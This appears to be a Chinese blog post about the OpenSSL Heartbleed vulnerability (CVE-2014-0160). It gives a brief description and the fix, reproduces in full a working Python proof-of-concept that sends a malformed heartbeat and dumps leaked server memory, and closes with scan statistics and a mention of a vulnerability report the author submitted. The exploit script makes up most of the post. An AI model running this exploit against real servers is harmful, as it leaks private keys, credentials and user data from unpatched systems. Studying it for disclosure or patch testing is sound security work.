zoukankan      html  css  js  c++  java

  • OpenSSL "heartbleed" 安全漏洞

    在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟服务提供者和用户来直接从服务提供者盗取数据。

    目前该问题的解决可以通过升级到 OpenSSL 1.0.1g 版本。

    Exploit:

    openssl.py

      1 #!/usr/bin/python
  2  
  3 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  4 # The author disclaims copyright to this source code.
  5  
  6 import sys
  7 import struct
  8 import socket
  9 import time
 10 import select
 11 import re
 12 from optparse import OptionParser
 13  
 14 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
 15 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 16  
 17 def h2bin(x):
 18     return x.replace(' ', '').replace('
', '').decode('hex')
 19  
 20 hello = h2bin('''
 21 16 03 02 00  dc 01 00 00 d8 03 02 53
 22 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
 23 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
 24 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
 25 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
 26 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
 27 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
 28 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
 29 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
 30 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
 31 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
 32 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
 33 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
 34 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
 35 00 0f 00 01 01                                  
 36 ''')
 37  
 38 hb = h2bin(''' 
 39 18 03 02 00 03
 40 01 40 00
 41 ''')
 42  
 43 def hexdump(s):
 44     for b in xrange(0, len(s), 16):
 45         lin = [c for c in s[b : b + 16]]
 46         hxdat = ' '.join('%02X' % ord(c) for c in lin)
 47         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
 48         print '  %04x: %-48s %s' % (b, hxdat, pdat)
 49     print
 50  
 51 def recvall(s, length, timeout=5):
 52     endtime = time.time() + timeout
 53     rdata = ''
 54     remain = length
 55     while remain > 0:
 56         rtime = endtime - time.time() 
 57         if rtime < 0:
 58             return None
 59         r, w, e = select.select([s], [], [], 5)
 60         if s in r:
 61             data = s.recv(remain)
 62             # EOF?
 63             if not data:
 64                 return None
 65             rdata += data
 66             remain -= len(data)
 67     return rdata
 68          
 69  
 70 def recvmsg(s):
 71     hdr = recvall(s, 5)
 72     if hdr is None:
 73         print 'Unexpected EOF receiving record header - server closed connection'
 74         return None, None, None
 75     typ, ver, ln = struct.unpack('>BHH', hdr)
 76     pay = recvall(s, ln, 10)
 77     if pay is None:
 78         print 'Unexpected EOF receiving record payload - server closed connection'
 79         return None, None, None
 80     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
 81     return typ, ver, pay
 82  
 83 def hit_hb(s):
 84     s.send(hb)
 85     while True:
 86         typ, ver, pay = recvmsg(s)
 87         if typ is None:
 88             print 'No heartbeat response received, server likely not vulnerable'
 89             return False
 90  
 91         if typ == 24:
 92             print 'Received heartbeat response:'
 93             hexdump(pay)
 94             if len(pay) > 3:
 95                 print 'WARNING: server returned more data than it should - server is vulnerable!'
 96             else:
 97                 print 'Server processed malformed heartbeat, but did not return any extra data.'
 98             return True
 99  
100         if typ == 21:
101             print 'Received alert:'
102             hexdump(pay)
103             print 'Server returned error, likely not vulnerable'
104             return False
105  
106 def main():
107     opts, args = options.parse_args()
108     if len(args) < 1:
109         options.print_help()
110         return
111  
112     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
113     print 'Connecting...'
114     sys.stdout.flush()
115     s.connect((args[0], opts.port))
116     print 'Sending Client Hello...'
117     sys.stdout.flush()
118     s.send(hello)
119     print 'Waiting for Server Hello...'
120     sys.stdout.flush()
121     while True:
122         typ, ver, pay = recvmsg(s)
123         if typ == None:
124             print 'Server closed connection without sending Server Hello.'
125             return
126         # Look for server hello done message.
127         if typ == 22 and ord(pay[0]) == 0x0E:
128             break
129  
130     print 'Sending heartbeat request...'
131     sys.stdout.flush()
132     s.send(hb)
133     hit_hb(s)
134  
135 if __name__ == '__main__':
136     main()

     来自ZoomEye的统计,全国443端口:1601250,有33303个受本次OpenSSL漏洞影响!

    铁道部12306系统的漏洞被猪猪侠抢先了。结果我的被驳回了。详情见:

    http://wooyun.org/bugs/wooyun-2014-055939
  • 相关阅读:
    mount命令以及mount ntfs硬盘权限权限与显示的问题 分类: shell ubuntu 2014-11-08 18:29 148人阅读 评论(0) 收藏
    Rebuild my Ubuntu 分类: ubuntu shell 2014-11-08 18:23 193人阅读 评论(0) 收藏
    摄像头参数查看与调节 分类: C/C++ OpenCV 2014-11-08 18:13 138人阅读 评论(0) 收藏
    highgui.h备查 分类: C/C++ OpenCV 2014-11-08 18:11 292人阅读 评论(0) 收藏
    const char*, char const* and char *const 分类: C/C++ OpenCV 2014-11-08 18:10 114人阅读 评论(0) 收藏
    由 argv引出的main参数 分类: C/C++ 2014-11-08 18:00 154人阅读 评论(0) 收藏
    写在新建博客的第一天 分类: fool_tree的笔记本 2014-11-08 17:57 144人阅读 评论(0) 收藏
    Latex笔记(参考文献) 分类: LaTex 2014-11-08 17:41 239人阅读 评论(0) 收藏
    windows下使用github
    C# 笔记——索引器
  • 原文地址:https://www.cnblogs.com/im404/p/3653164.html
Copyright © 2011-2022 走看看